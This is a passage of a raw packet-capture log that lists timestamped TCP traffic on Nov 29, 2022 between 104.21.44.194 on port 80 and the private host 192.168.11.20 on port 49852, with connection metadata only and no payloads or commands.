                                                                          Nov 29, 2022 09:20:40.612797976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612811089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612823009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612834930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612847090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612859011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612869978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612881899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612893105 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612905025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612916946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612927914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612940073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612951994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612962961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612974882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612986088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.612998009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613012075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613023043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613034964 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613046885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613059044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613070011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613081932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613094091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613105059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613110065 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613117933 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613128901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613141060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613152981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613168001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613193035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613205910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613230944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613243103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613272905 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613285065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613287926 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613287926 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613297939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613310099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613322020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613336086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613349915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613362074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613373995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613389015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613400936 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613413095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613440037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613451958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613455057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613464117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613476038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613490105 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613501072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613502026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613513947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613543987 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613558054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613570929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613583088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613595963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613607883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613632917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613645077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613656998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613668919 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613672018 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613679886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613709927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613722086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613735914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613749981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613761902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613774061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613787889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613801003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613812923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613826990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613842964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613842964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613842964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613842964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613842964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613842964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613842964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613842964 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.613846064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613858938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613872051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613883972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613895893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613909006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613920927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613934994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613949060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613974094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613986969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.613998890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614011049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614012003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614012003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614012003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614012003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614022970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614033937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614046097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614070892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614084005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614097118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614109039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614121914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614134073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614160061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614181042 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614186049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614200115 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614212036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614223957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614237070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614263058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614274979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614285946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614300013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614311934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614322901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614347935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614351988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614351988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614351988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614361048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614372969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614386082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614398003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614423037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614449024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614460945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614485979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614497900 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614510059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614520073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614521027 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614532948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614543915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614556074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614567995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614578962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614590883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614602089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614628077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614640951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614654064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614666939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614679098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614691019 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614691019 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614691019 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614691019 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614691019 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614691019 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614691019 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614692926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614706039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614718914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614731073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614744902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614757061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614768982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614782095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614794016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614806890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614819050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614830971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614842892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614864111 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614864111 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614865065 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614865065 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614865065 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.614866972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614867926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614881039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614892960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614905119 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614917040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614928961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614940882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614953041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614964962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614976883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.614989042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615000963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615014076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615025997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615037918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615050077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615062952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615075111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615087032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615098953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615112066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615123987 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615135908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615148067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615160942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615173101 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615185022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615199089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615211010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615223885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615236044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615250111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615262985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615274906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615288019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615298033 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615302086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615314960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615326881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615339041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615350962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615362883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615375996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615387917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615400076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615411997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615423918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615436077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615448952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615461111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615468025 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468025 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615473032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615484953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615497112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615509033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615521908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615534067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615545988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615557909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615570068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615581989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615602970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615616083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615628958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615641117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615643978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615653992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615665913 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615679979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615693092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615705967 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615731955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615744114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615756035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615767956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615778923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615791082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615803003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615812063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615812063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615812063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615812063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615812063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615813971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615825891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615838051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615849972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615860939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615873098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615885019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615909100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615921974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615933895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615947008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615972042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615983963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615995884 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616008043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616019011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616030931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616043091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616055012 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616065979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616077900 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616089106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616100073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616111994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616122961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616134882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616146088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616158009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616169930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616195917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
